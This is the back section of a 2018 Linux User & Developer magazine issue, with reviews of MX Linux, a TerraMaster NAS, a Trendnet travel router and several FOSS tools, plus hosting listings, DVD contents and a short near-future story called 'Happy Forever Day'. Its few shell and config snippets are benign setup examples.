Whonix: An easy-to-deploy distribution that uses virtualisation to ensure security and privacy. 8
And the Winner Is…
Qubes OS
There’s very little to choose between the
contenders, with all of them doing their bit
to protect users from vulnerabilities and
exploits. Linux Kodachi and Subgraph OS
are pretty similar in that both use sandboxed
environments to isolate applications from
each other and limit their footprint on a
system, which makes them some of the best
means to shield your data. Both projects also
make good use of the Tor network to help
their users remain anonymous online.
The main reasons for Kodachi’s elimination
are that it doesn’t use a hardened kernel and
it isn’t easy to install. These problems don’t
exist in the Snowden-endorsed Subgraph,
which is steered by a team of developers with
a proven track record of developing security-centred apps.
Subgraph also doesn't have the same steep learning curve as some of its peers, and offers far better protection than a regular desktop distribution. However, many security engineers have pointed out security and privacy leaks that make it less secure than our winner. Even its developers accept that Subgraph needs improvements.
This leaves us with Whonix and Qubes. Whonix is more geared towards privacy, while Qubes is designed to be a comprehensive secure OS. They are the two most innovative and technically superior options of the lot, though at the same time they are also the most cumbersome and resource-intensive to deploy and operate. But regular LU&D readers will understand that effective security is an involved process, and won't shy away from putting in the effort required to set up Qubes. Additionally, you can install the Whonix Template on Qubes OS – and you can always check our Qubes feature (see p60, Features, LU&D189) to get to grips with it.
Mayank Sharma

n Open unfamiliar files in a DisposableVM to make sure they don't compromise the rest of the system

Never miss an issue – special USA offer: get 6 issues free*. Offer ends June 30 2018.


DVD: Ultimate distros & FOSS – install today!

Ubuntu MATE 18.04 (Beta 2)
Sample a modern take on the traditional desktop metaphor. Built on the solid foundations of the latest Ubuntu 18.04 LTS, this benefits from February's new release of MATE 1.20, which now has HiDPI support for crisper, more detailed images.

MX Linux 17.1
A middleweight distro using a custom Xfce desktop which packs an excellent selection of administrative utilities into its MX Tools dashboard.

Devuan 2.0 ASCII (Beta)
An incredibly solid beta of the next edition of Devuan, the distro without systemd. Comes with a new login and device file manager.

Plus: all the tutorial code
If you dived straight into our Control Containers feature (on p18), you'll want to grab our example scripts, Dockerfiles, Ansible playbook samples and Puppet manifests. For this issue's computer security coverage on privilege escalation – something of an art – we've included a few tools of the trade, including Vulners Scanner for sniffing out vulnerable packages.
Disclaimer
In no event will Future Publishing Limited accept liability or be held responsible for any damage, disruption and/or loss to data or systems as a result of using this disc. Future Publishing Limited makes every effort to ensure that this disc is delivered to you free from viruses and spyware. We do still recommend that you run a virus checker over this disc before use. Future Publishing Limited cannot guarantee that at the time of use, hyperlinks direct to that same intended content, as Future Publishing has no control over the content delivered by these hyperlinks. Unless otherwise stated, all software on this disc is distributed in accordance with the GNU General Public License. For more information on the GNU GPL please visit www.gnu.org/licenses/gpl-3.0.txt.

Contact
Future Publishing, Quay House, The Ambury, Bath, BANES, BA1 1UA
Tel: +44 (0)1225 442244
Website: www.linuxuser.co.uk

Please note
This DVD autoboots to a menu, so simply insert the disc and reboot your PC. Please ensure your DVD drive is set to boot before your hard drive. Consult your PC manufacturer's instructions. Thanks for supporting Future Publishing. 2018 Future Publishing Ltd.

Subscriptions
Subscribe to Linux User & Developer today!
UK: 0844 249 0282
Overseas: +44 1795 419161
Email: [email protected]
6-issue subscription (UK) – £32
13-issue subscription (Europe) – €88
13-issue subscription (World) – $112

Free with issue 191: MX Linux 17.1 – a fast, friendly and stable Linux distribution loaded with an exceptional bundle of tools – plus a powerful new OS, Ubuntu MATE 18.04 Beta 2: all the power of Ubuntu plus MATE's traditional desktop experience and enhanced HiDPI support.

Order online & save: www.myfavouritemagazines.co.uk/sublud OR CALL 0344 848 2852
* This is a US subscription offer. ‘6 issues free’ refers to the USA newsstand price of $16.99 for 13 issues being $220.87, compared to $112.23 for a subscription. You will
receive 13 issues in a year. You can write to us or call us to cancel your subscription within 14 days of purchase. Payment is non-refundable after the 14-day cancellation
period unless exceptional circumstances apply. Your statutory rights are not affected. Prices correct at point of print and subject to change. Full details of the Direct
Debit guarantee are available upon request. UK calls cost the same as other standard fixed line numbers (starting 01 or 02) included as part of any inclusive or free
minutes allowances (if offered by your phone tariff). For full terms and conditions please visit bit.ly/magtandc. Offer ends June 30 2018.
Review TerraMaster F4-420 NAS & Trendnet TEW-817DTR

TerraMaster F4-420 NAS
Powerful NAS hardware that deserves better software development, documentation and support

Pros
Offers a strong enclosure, easy installation and a powerful platform that's quiet in operation.

Cons
No drive locks supplied and a combination of limited application selection and generally poor app support.

Summary
Solid enough construction and hardware design (if you like rounded silver surfaces) can't overcome the lack of attention given to the operating system and applications. Poor docs, limited apps and CPU power that is difficult to use are all issues here.
Hardware: 7
software development, documentation and support
Price: £400 ($460)
Website: www.terra-master.com/uk

Specs
CPU: Intel Celeron J1900 2GHz
RAM: 4GB DDR3
Drive bays: 4
Compatible drives: 4x 3.5-inch or 2.5-inch SATA 6Gb/s, SATA 3Gb/s hard drive or SSD
Read & Write: 220MB/s, 210MB/s
Ports: USB 2.0, USB 3.0, 2x Ethernet (1000/100/10Mbps)
RAID support: RAID 0, 1, 5, 6, 10, JBOD, SINGLE
Network protocols: SMB, AFP, NFS, ISCSI, FTP
Size: 227 x 225 x 136 mm
See website for more specifications

The TerraMaster is a NAS solution with four vertically mounted 3.5-inch drive bays (without locks) on the front. At the back are two USB ports – one USB 3.0 and one USB 2.0 – and two gigabit Ethernet LAN ports. There are also two 80mm fans at the rear and power input for a laptop-style PSU. If you have four 12TB hard drives handy, there is the potential for 48TB of storage, but only if you're willing to lose any form of resilience to drive failure.
The F4-420 has a quad-core 2GHz Intel Celeron (J1900) and 4GB of DDR3 memory, but the file-serving performance is entirely dependent on having a managed switch with the ability to create channel bonding. Without that, the best speed you'll see, almost regardless of the drives in use, is 115MB/s read and 110MB/s write. With both Ethernet ports connected to a suitable switch, those speeds can be doubled – but unless connected PCs have dual LAN networking, the extra performance is aggregated across multiple users.
Getting our review unit operational was relatively painless on Linux. On the software side, it involves downloading a Java-based desktop app, searching for the NAS on your network and updating TerraMaster Operating System (TOS) 3.1, a Linux-based OS. The documentation could do with a refresh and updating TOS can be slow, but once up and rolling this NAS box works well, although it has to be said this isn't anything special from a functionality standpoint.
TOS offers a modest selection of installable apps, including MySQL Server, Plex Media Server, Sugar CRM, WordPress and Apache Tomcat. The F4-420 also includes rclone for syncing cloud services such as Google and Amazon S3; however, you'll need to hit the terminal and ignore the provided web interface to get it to work. Some functionality is pre-installed, such as DLNA, Time Machine, FTP and Rsync, which are configured through the control panel.
There is very little wrong with the TerraMaster hardware – it just needs a better software platform to exploit it fully, and an ongoing development cycle to enhance the user experience.
Mark Pickavance
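Since the review notes that rclone on the F4-420 has to be driven from the terminal, here is a hedged sketch of what that setup involves. The remote name, region and credential values are placeholders invented for the demo, and the NAS share path is illustrative; rclone's own `rclone config` wizard is the usual way to produce this file.

```shell
# Sketch of the config rclone expects for an S3 remote; the values
# below are placeholders, not real credentials.
mkdir -p "$HOME/.config/rclone"
cat > "$HOME/.config/rclone/rclone.conf" <<'EOF'
[s3backup]
type = s3
provider = AWS
access_key_id = YOUR_KEY
secret_access_key = YOUR_SECRET
region = eu-west-1
EOF
# Then, from the NAS shell, a one-way sync might look like:
#   rclone sync /Volume1/share s3backup:my-bucket/nas-backups
```

Once the config file is in place, every rclone subcommand (`sync`, `copy`, `ls`) can address the remote by its section name.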

Pros
An affordable price for a wireless router that is WISP-capable, while still being highly portable for travellers.

Cons
Needs a carry pouch, and the manufacturer needs to address the captive portals restriction for it to be almost perfect.

Summary
This compact travel router is inexpensive, easy to carry and deploy. It also supports WISP technology for those who have a service agreement with a provider, allowing completely independent connectivity in areas with coverage.
Hardware: 9

Trendnet TEW-817DTR
A portable wireless router for the business traveller who's in search of a decent connection

Price: £29 ($35)
Website: www.trendnet.com

Specs
Standards: IEEE 802.3/u, 802.11a/b/g/n/ac
Modes: Router, repeater, WISP
Hardware interfaces: 10/100 Mbps port, router/AP-WISP/off switch, WPS button, reset button, LED indicators, interchangeable power plugs: US, EU, UK
Features: IPv6, dual-band connectivity, multiple SSID, multicast to unicast converter, WDS and VPN passthrough support
Size: 58x47x89 mm

Many hotels provide a wired connection in their rooms; the Trendnet TEW-817DTR is a portable device that takes advantage of this, with the functionality of an AC750 wireless router in a pocket-sized enclosure. On the front is a single Ethernet port with mode selector, and on the right is a WPS button and reset switch. Trendnet also includes power adaptor pins for the UK, US and Europe, although there's no pouch to hold them.
You can use the device in two basic ways. The first is as a wireless access point; the Wi-Fi connectivity on offer is basic but serviceable on both 2.4GHz and 5GHz bands. The second mode, mostly of interest to those in the US, is AP-WISP for connecting to a Wireless Internet Service Provider. The only caveat is that the hardware isn't compatible with captive portal wireless login pages. The WISP mode also doubles as a standard access point and repeater, so you can use it to extend an existing wired or wireless network.
Most users are looking for a Wi-Fi service that works in a single hotel room or room cluster, so we tested the Trendnet on the ground floor of a modest property divided by solid block walls, and the signal remained strong over the whole test location. At short range, the 5GHz spectrum is superior, but both it and 2.4GHz are strong within a series of adjoining rooms. The quickest speeds you can get from any source through Ethernet are in the 8-10MB/s range, as dictated by the 10/100Mbit downlink port. Ironically, if one user is connected wirelessly via 2.4GHz and the other at 5GHz, it's possible to get 25MB/s between devices.
In terms of security, the Trendnet offers the ability to tier users using guest access, multiple SSIDs and parental controls. There is also PPTP/L2TP/IPsec VPN pass-through, Virtual Server and DMZ definitions, plus QoS. Although not suggested by the documentation, it supports WEP, WPA, WPA2 and, critically, WPA2-Enterprise.
The TEW-817DTR does pretty much what Trendnet claims. It's a flexible and affordable solution that can help you remain connected away from the office.
Mark Pickavance
Review MX Linux 17.1

Above Being desktop-orientated, MX Linux includes a bunch of non-free software that you can list with the vrms command

Distro

MX Linux 17.1
A joint effort of two popular projects, this elegant
distribution is steadily gaining in popularity
Specs
CPU: i686 Intel or AMD processor
Graphics: Video adaptor and monitor with 1,024x768 or higher resolution
RAM: 512MB
Storage: 5GB
License: GPL and various
Available from: https://mxlinux.org

Above MX Linux very responsibly notifies users when a program is started with root permission without it prompting the user

Pros
The custom package manager with its list of curated packages and custom MX Tools.

"Advanced users will appreciate the option to control the services that start during boot, while new users can press ahead with the defaults"

The MX Linux project is a joint effort between the antiX and MEPIS communities, and the distribution they produce uses some modified components from both projects. MX Linux is also popular for its stance of sticking with sysvinit instead of switching over to systemd.
The distribution uses a customised Xfce for a dapper-looking desktop that performs adequately even on older hardware. MX Linux ships as a Live environment and uses a custom installer verbose enough to explain what's going on with the various steps. The installer also uses reasonable defaults that'll help first-timers sail through the installation. The partitioning screen offers the option to partition the disk automatically if you want MX Linux to take over the entire disk; dual-booters and advanced users will have to use GParted to manually partition the disk. Advanced users will appreciate the option to control the services that start during boot, while new users can press ahead with the defaults. If you've made any modifications to the desktop in the Live environment, you can ask the installer to carry these over to the installation, which is a nice touch.
The desktop boots to a welcome screen that contains useful links to common tweaks and the distribution's set of custom tools. The installation also includes a detailed 172-page user's manual and you can access other avenues of help and support,
including forums and videos, on the project's website. The clean, iconless desktop displays basic system information via an attractive Conky display. Also by default, the Xfce panel is pinned to the left side of the screen and uses the Whisker menu.
MX Linux's default collection of apps doesn't disappoint, as it includes everything to fulfill the requirements of a typical desktop user. In addition to a host of Xfce apps and utilities, there's Firefox, Thunderbird, LibreOffice, GIMP, VLC, luckyBackup, and more. MX is built on the current Debian Stable release but updates a lot of apps and back-ports newer versions from Debian Testing. The only downside of this arrangement is that you'll have to do a fresh install of MX Linux when the distribution switches to a new Debian Stable release.
An icon in the status bar announces available updates; you can click it to open the update utility, which works in two modes. The default is the full upgrade mode, which is the equivalent of dist-upgrade and will update packages and resolve dependencies even if it requires adding or removing new packages. There's also a basic upgrade mode that will only install available updates. In the latest 17.1 release, the update utility has new options to enable unattended installations using either of these mechanisms.
The update utility is part of the distribution's set of custom tools designed to help users manage their installation. These are housed under the MX Tools dashboard and cover a wide range of functionality, including a boot-repair tool, a codecs downloader, a utility to manipulate Conky, a Live USB creator, and a snapshot tool for making bootable ISO images of the working installation.
One of the tools you'll be using quite often is the MX Package Installer, which has undergone a major rewrite in the 17.1 release. The installer includes popular applications from the Debian Stable repositories along with packages from Debian Testing. It also lists curated packages that aren't in either repository but which have been pulled from the official developers' websites or other repositories, and have been configured to work seamlessly with MX Linux.

Cons
The hassle of backing up data and a fresh install whenever MX switches to a new Debian Stable.

Summary
MX Linux is a wonderfully built distribution that scores well for looks and performance. The highlight is its custom tools that make regular admin tasks a breeze. The package manager, and the remastering and snapshot tools, also deserve a mention. 9
Mayank Sharma
Review Fresh free & open source software

Desktop search

Searchmonkey JAVA 3.2.0


Get the power of CLI search tools in a graphical version
Most file managers have a find function
to help you search for files. But these
lack powerful filtering mechanisms such
as regular expressions that are usually
only available on the command line. Searchmonkey
JAVA is a graphical tool that bridges the gap between
the basic functions of file managers and powerful
CLI tools by bringing a feature-rich regular-
expression builder to the desktop.
You can use Searchmonkey to easily construct a
complex search query with little effort. It can help
you search for files by their size, type, creation,
modification and last-accessed date. You can also
search for files recursively, and the app enables you
to control how many subfolders it should look into.
The Option tab houses other advanced search
options such as the option to skip binary files and
limit the number of files in the results. When you've built your query, you can use the Test Expression option before unleashing it on your file system.
Searchmonkey JAVA requires Java JRE 1.8 or above (there are versions for GNOME and KDE too), and you can use the app without installation. Head to the Download section on its website, grab the JAR file that includes all the dependencies, and then run it with the java -jar command.

Above Developers can use the application to quickly scan and highlight expressions inside a bunch of source code files, for example

Pros
Helps desktop users create complex and powerful search queries with little time and effort.

Cons
The interface might seem a little daunting, and as a Java app it sticks out like a sore thumb.

Great for...
Building complex search queries from the desktop.
http://searchmonkey.embeddediq.com
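The "powerful CLI tools" that Searchmonkey wraps can be combined by hand to get the same effect: find supplies the size, date and recursion filters, while grep supplies the regular expression. A minimal sketch (the paths, file contents and pattern are invented for the demo):

```shell
# Set up a tiny tree to search through
mkdir -p /tmp/sm-demo/src
printf 'TODO: fix buffer overflow\n' > /tmp/sm-demo/src/main.c
printf 'all done here\n'             > /tmp/sm-demo/src/notes.txt

# Recursively find files under 100KB, modified in the last 7 days,
# whose content matches a regular expression (prints matching paths)
find /tmp/sm-demo -type f -size -100k -mtime -7 \
    -exec grep -lE 'TODO|FIXME' {} +
```

Swapping `grep -l` for `grep -n` lists the matching lines with line numbers, which is roughly what Searchmonkey's results pane shows graphically.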

Media manager

beets 1.4.6
Organise your media library from the command line

Keyboard warriors who love the command line can now even beat their media library into shape with beets. In addition to managing music libraries, beets can fix the filenames and metadata of your music collection, fetch cover art and lyrics, transcode audio to different formats, and do a lot more. While beets is available in the repositories of popular distributions, you should install the latest version using Python's pip package manager with pip install beets. You'll need to spend some time creating a configuration file for the utility.
Once created, beets will import your music files and sort them as per the instructions in the configuration file. During import, the utility also fixes and fills in any gaps in the metadata by referencing the online MusicBrainz database. Once the files have been imported, you can query the collection using beets' own commands. For example, beet ls -a year:1983..1985 lists all your albums released between 1983 and 1985.
beets also has a simple web UI. To use the web interface you need the Flask framework, which you can install with pip install flask. You can then enable the web interface in the configuration file before heading to http://localhost:8337 to display it. From here you can search through your imported music collection. Click a song from the results to view its metadata, including the lyrics if you've enabled the plug-in and fetched them. The web interface also has basic controls to play and pause music.

Pros
Enables you to easily sort and catalogue your entire music collection with a single command, including cover art and lyrics.

Cons
Requires a configuration file to do its magic that needs to be crafted manually, which will take a little time.

Great for...
Sorting a large collection of music files with relative ease from the CLI.
http://beets.io
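The configuration file the review says you'll need can start out very small. A minimal sketch follows; the paths and plug-in choices are illustrative examples rather than required values:

```shell
# Write a minimal starting point for beets' configuration file
mkdir -p "$HOME/.config/beets"
cat > "$HOME/.config/beets/config.yaml" <<'EOF'
directory: ~/Music                        # where sorted files end up
library: ~/.config/beets/musiclibrary.db  # beets' metadata database
import:
  move: yes                               # move rather than copy on import
plugins: fetchart lyrics web              # cover art, lyrics and the web UI
EOF
# With beets installed (pip install beets), a typical session is then:
#   beet import ~/incoming-music
#   beet ls -a year:1983..1985
```

Enabling the web plug-in here is what makes the http://localhost:8337 interface mentioned above available via `beet web`.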

Programming Language

Gambas 3.11.0
A convenient way to build graphical apps for Linux

Gambas, which is a recursive acronym for Gambas Almost Means Basic, is an object-orientated dialect of the Basic programming language. Gambas' purpose is to mimic Visual Basic's ease of use while introducing improved functionality. If you're familiar with VB, you can get started with Gambas without much trouble, although the two aren't source-code compatible. Gambas makes it very easy to build graphical apps on Linux using the Qt4 or the GTK+ toolkits, and also includes a GUI designer to help ease the process. In fact, Gambas includes an IDE written in Gambas itself.
Gambas is a true object-orientated language with objects and classes, methods, constants, polymorphism, constructors and destructors, and more. You can use it to write network apps and for SDL, XML and OpenGL programming. Gambas can also be used as a scripting language. The Gambas IDE exposes all the useful functions of the underlying programming language. Besides its graphical toolkits, Gambas works with databases such as MySQL, SQLite and PostgreSQL. You can even use the IDE to create installation packages for many distributions including Arch, Debian, Fedora, Ubuntu and Slackware.
Gambas is available in the official repositories of all popular distributions. The latest release is a minor feature release with fixes and tweaks to various components including the code editor, the database editor, the debugging panel, the form editor, the packager wizard and more.

Pros
Simplifies the building of graphical apps for Linux using the Qt4 or GTK+ toolkits and a designer.

Cons
Some people dislike it for its Visual Basic lineage, while others count this as a strength.

Great for...
Building a graphical user interface for apps using Visual Basic-like syntax.
http://gambas.sourceforge.net

Screencast recorder

SimpleScreenRecorder 0.3.10
Record and share desktop screencasts with ease
This app’s name is actually something
of a misnomer. It’s flush with features
and tweakable parameters, and gives
its users a good amount of control over
the screencast. SSR can record the entire screen
and also enables you to select and record particular
windows and regions on the desktop.
It uses a wizard-like interface and each step of the
process has several options. All these have helpful
tooltips that do a wonderful job of explaining their
purpose. In addition to selecting the dimensions of
the screen recording, you can also scale the video
and alter its frame rate.
The next screen offers several options for
selecting the container and audio and video codecs
for the recording, as well as a few associated
settings. SSR supports all the container formats that
are supported by the FFmpeg and libav libraries, including MKV, MP4, WebM and OGG, as well as a host of others such as 3GP, AVI and MOV. You can also choose codecs for the audio and video stream separately, and preview the recording area before you start capturing it.
While it's recording, the application enables you to keep an eye on various recording parameters, such as the size of the captured video.

Above If you want, you can pass additional options via CLI parameters and save them as custom profiles for later use

Pros
A well-documented interface that's easy to use but still manages to pack in a lot of parameters.

Cons
Lacks some options offered by its peers, such as the ability to record a webcam with the desktop.

Great for...
Making quick screencasts in all popular formats.
http://www.maartenbaert.be/simplescreenrecorder

Web Hosting
Get your listing in our directory. To advertise here, contact Chris: [email protected] | +44 01225 68 7832 (ext. 7832)

Hosting listings

Featured host: Netcetera
www.netcetera.co.uk | 03330 439780
Netcetera is one of Europe's leading web hosting service providers, with customers in over 75 countries worldwide.

About us
Formed in 1996, Netcetera is one of Europe's leading web hosting service providers, with customers in over 75 countries worldwide. It is a leading IT infrastructure provider offering co-location, dedicated servers and managed infrastructure services to businesses worldwide.

What we offer
• Managed Hosting: A full range of solutions for a cost-effective, reliable, secure host
• Dedicated Servers: Single server through to full racks, with FREE setup and a generous bandwidth allowance
• Cloud Hosting: Linux, Windows, hybrid and private cloud solutions with support and scalability features
• Datacentre co-location: From quad-core up to smart servers, with quick setup and full customisation
Five tips from the pros

01 Optimise your website images
When uploading your website to the internet, make sure all of your images are optimised for the web. Try using jpegmini.com software; or, if using WordPress, install the EWWW Image Optimizer plugin.

02 Host your website in the UK
Make sure your website is hosted in the UK, and not just for legal reasons. If your server is located overseas, you may be missing out on search engine rankings on google.co.uk – you can check where your site is based on www.check-host.net.

03 Do you make regular backups?
How would it affect your business if you lost your website today? It's vital to always make your own backups; even if your host offers you a backup solution, it's important to take responsibility for your own data and protect it.

04 Trying to rank on Google?
Google made some changes in 2015. If you're struggling to rank on Google, make sure that your website is mobile-responsive. Plus, Google now prefers secure (HTTPS) websites. Contact your host to set up and force HTTPS on your website.

05 Avoid cheap hosting
We're sure you've seen those TV adverts for domain and hosting for £1! Think about the logic… for £1, how many clients will be jam-packed onto that server? Surely they would use cheap £20 drives rather than £1k+ enterprise SSDs? Remember: you do get what you pay for.

Testimonials

David Brewer
"I bought an SSL certificate. Purchasing is painless, and only takes a few minutes. My difficulty is installing the certificate, which is something I can never do. However, I simply raise a trouble ticket and the support team are quickly on the case. Within ten minutes I hear from the certificate signing authority, and approve. The support team then installed the certificate for me."

Tracy Hops
"We have several servers from Netcetera and the network connectivity is top-notch – great uptime and speed is never an issue. Tech support is knowledgeable and quick in replying – which is a bonus. We would highly recommend Netcetera."

J Edwards
"After trying out lots of other hosting companies, you seem to have the best customer service by a long way, and all the features I need. Shared hosting is very fast, and the control panel is comprehensive…"
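Tip 04 mentions forcing HTTPS on your website. As an illustrative sketch only – the exact setup depends on your host and web server, and `example.com` is a placeholder domain – a minimal nginx server block that redirects all plain-HTTP traffic to HTTPS might look like this:

```nginx
# Hypothetical example: redirect every HTTP request to its HTTPS equivalent.
# Assumes an HTTPS server block for example.com is configured elsewhere.
server {
    listen 80;
    listen [::]:80;
    server_name example.com www.example.com;

    # 301 = permanent redirect, which search engines treat as authoritative
    return 301 https://$host$request_uri;
}
```

On managed hosting you often won't edit nginx directly; a support ticket or a control-panel toggle usually achieves the same thing.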

Supreme hosting
www.cwcs.co.uk | 0800 1 777 000
CWCS Managed Hosting is the UK's leading hosting specialist. It offers a fully comprehensive range of hosting products, services and support. Its highly trained staff are not only hosting experts, it's also committed to delivering a great customer experience and is passionate about what it does.
• Colocation hosting
• VPS
• 100% Network uptime

SSD web hosting
www.bargainhost.co.uk | 0843 289 2681
Since 2001, Bargain Host has campaigned to offer the lowest-priced possible hosting in the UK. It has achieved this goal successfully and built up a large client database which includes many repeat customers. It has also won several awards for providing an outstanding hosting service.
• Shared hosting
• Cloud servers
• Domain names

Enterprise hosting
elastichosts.co.uk | 02071 838250
ElasticHosts offers simple, flexible and cost-effective cloud services with high performance, availability and scalability for businesses worldwide. Its team of engineers provide excellent support around the clock over the phone, email and ticketing system.
• Cloud servers on any OS
• Linux OS containers
• World-class 24/7 support

Value hosting
patchman-hosting.co.uk | 01642 424 237
WordPress comes pre-installed for new users or with free managed migration. The managed WordPress service is completely free for the first year.

Value Linux hosting
www.2020media.com | 0800 035 6364
We are known for our "Knowledgeable and excellent service", and we serve agencies, designers, developers and small businesses across the UK. Linux hosting is a great solution for home users, business users and web designers looking for cost-effective and powerful hosting. Whether you are building a single-page portfolio, or you are running a database-driven ecommerce website, there is a Linux hosting solution for you.
• Student hosting deals
• Site designer
• Domain names

Small business host
www.hostpapa.co.uk | 0800 051 7126
HostPapa is an award-winning web hosting service and a leader in green hosting. It offers one of the most fully featured hosting packages on the market, along with 24/7 customer support, learning resources and outstanding reliability.
• Website builder
• Budget prices
• Unlimited databases

Budget hosting
www.hetzner.de/us | +49 (0)9831 5050
Hetzner Online is a professional web hosting provider and experienced data-centre operator. Since 1997 the company has provided private and business clients with high-performance hosting products, as well as the necessary infrastructure for the efficient operation of websites. A combination of stable technology, attractive pricing and flexible support and services has enabled Hetzner Online to continuously strengthen its market position both nationally and internationally.
• Dedicated and shared hosting
• Colocation racks
• Internet domains and SSL certificates
• Storage boxes

Fast, reliable hosting
www.bytemark.co.uk | 01904 890 890
Founded in 2002, Bytemark are "the UK experts in cloud & dedicated hosting". Its manifesto includes in-house expertise, transparent pricing, free software support, keeping promises made by support staff and top-quality hosting hardware at fair prices.
• Managed hosting
• UK cloud hosting
• Linux hosting

Free Resources
Welcome to FileSilo!
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
what is it?
Every time you see this symbol in the magazine, there is free online content that's waiting to be unlocked on FileSilo.

why register?
• Secure and safe online access, from anywhere
• Free access for every reader, print and digital
• Download only the files you want, when you want
• All your gifts, from all your issues, all in one place

1. unlock your content
Go to www.filesilo.co.uk/linuxuser and follow the instructions on screen to create an account with our secure FileSilo system. When your issue arrives or you download your digital edition, log into your account and unlock individual issues by answering a simple question based on the pages of the magazine for instant access to the extras. Simple!

2. enjoy the resources
You can access FileSilo on any computer, tablet or smartphone device using any popular browser. However, we recommend that you use a computer to download content, as you may not be able to download files to other devices. If you have any problems with accessing content on FileSilo, take a look at the FAQs online or email our team at [email protected].

Free for digital readers too!
Read on your tablet, download on your computer.

Log in to www.filesilo.co.uk/linuxuser

Subscribe and get instant access
Get access to our entire library of resources with a money-saving subscription to the magazine – subscribe today!

This month find...


distros
It's Ubuntu time! Sample the popular official flavour, Ubuntu MATE 18.04 LTS (beta 2). Fancy something a little different? Take middleweight distro MX Linux 17.1 for a spin, and if you can't stand systemd grab Devuan 2.0 ASCII (beta).

software
Grab our privilege escalation bundle for the Computer Security tutorial, which includes the Lynis security auditing tool and the Vulners scanner.

tutorial code
Get into the container business with our example scripts, Dockerfiles, Ansible playbook samples and Puppet manifests.

Subscribe & save!
See all the details on how to subscribe on page 30.
NEXT ISSUE ON SALE 3 May
Master the Cloud | Unsolvable computing problems | Nextcloud for biz

follow us
Facebook: facebook.com/LinuxUserUK | Twitter: @linuxusermag

near-future fiction
Short story by Stephen Oram

Happy Forever Day


About Stephen Oram
Stephen writes near-future science fiction. He's been a hippie-punk, religious-squatter and a bureaucrat-anarchist; he thrives on contradictions. He has two published novels, Quantum Confessions and Fluence, and is in several anthologies. His recent collection, Eating Robots and Other Stories, was described by the Morning Star as one of the top radical works of fiction in 2017.

Uncle Bill is the first to arrive. With the endless energy of a sixteen-year-old, he bursts into the room. "Party!" he screams.
I wish he wouldn't. It's hard enough to celebrate your fifty-third birthday, every single year, without having the added weight of trying to ignore the enthusiasm of your younger older uncle – I still haven't worked out what to call my ancestors who chose to stop ageing at a younger age than I did.
He's never going to grow up, and any experience he gains won't turn into wisdom because of the strange effects of renewing brain cells. But knowing he's never going to change doesn't make him any easier to be around.
Next is Joanna, my ninety-five-year-old granddaughter. "Grandpa," she says, giving me a beautifully-wrapped present. "Happy Forever Day."
"It's about time you chose yours," I reply. "You can't put it off for ever."
She lowers herself carefully on to the nearest chair. "I know, I know. Well, I can put it off for as long as I live. Pass me a gin."
I pour her a strong gin and tonic, just the way she likes it, and wait for the alcohol to work its way into her blood before returning to the perennial topic. Her Forever Day.
"It's not really fair on the rest of us, is it, my darling?"
"Oh, for goodness' sake, stop it. Think of all the knowledge I retain and the wisdom I'm accumulating. Why would I ever choose to lose that?"
"Err… because you're a health burden."
"I'm not that decrepit you know. Quit fussing."
"Joanna, why won't you choose?"
"I would have stopped when menstruation ended and contraception became a thing of the past, but I like getting older. It makes me feel alive."
Every year we have this conversation – since she turned fifty-three and overtook me. As time goes by, it's become easier and easier to think of her as my grandmother rather than the granddaughter she really is. And every year she respects me less.
Uncle Bill bounds across the room and slaps me on the back. "Forever is a long time," he says. "It's a really long time, so let's enjoy."
He glances down at Joanna and opens his mouth to speak, but stops himself. There's never been a good conversation between them. They are definitely not the sort of opposites that attract.
He hovers, balancing on one foot and then the other, his eyes pretending to scan the room.
Joanna stands up. It's painful to watch her body coping with old age. It's why most people avoid her. That, and the fact that she plays the cantankerous old woman a little too well. Thankfully, she's fairly straight with me.
"I'll leave you young 'uns to it," she says and raises her glass. "Happy Forever Day."
Uncle Bill leans in close. "It's not right, is it?" he whispers.
"What?" I ask.
"Her. That great-great-niece of mine. She shouldn't keep ageing. We'll have to pay for her medical bills. It's so embarrassing, having an Ancient. Not to mention the shame of a funeral, if she lets it get that far."
He's got a point, but it's a clumsy way of expressing it. Immature. I like to think I hold my head up high and support everyone's choice, no matter what they choose. But he's right. I don't. None of us do.
He takes a small round container from his jacket pocket.
It can't be. Can it? He wouldn't. Would he?
He sees me looking and winks. "The clinic," he says. "Sometimes you have to take control."
"No…" But he's gone, weaving between the guests, heading towards Joanna.
I can't quite make it out, but I'm sure he slips something from his container into her gin as he passes by.
She lifts her glass from the table, swallows the last mouthful and begins to sway.
As she faints, Uncle Bill steps forward, grabs her under the armpits and helps her outside.

The source for tech buying advice
techradar.com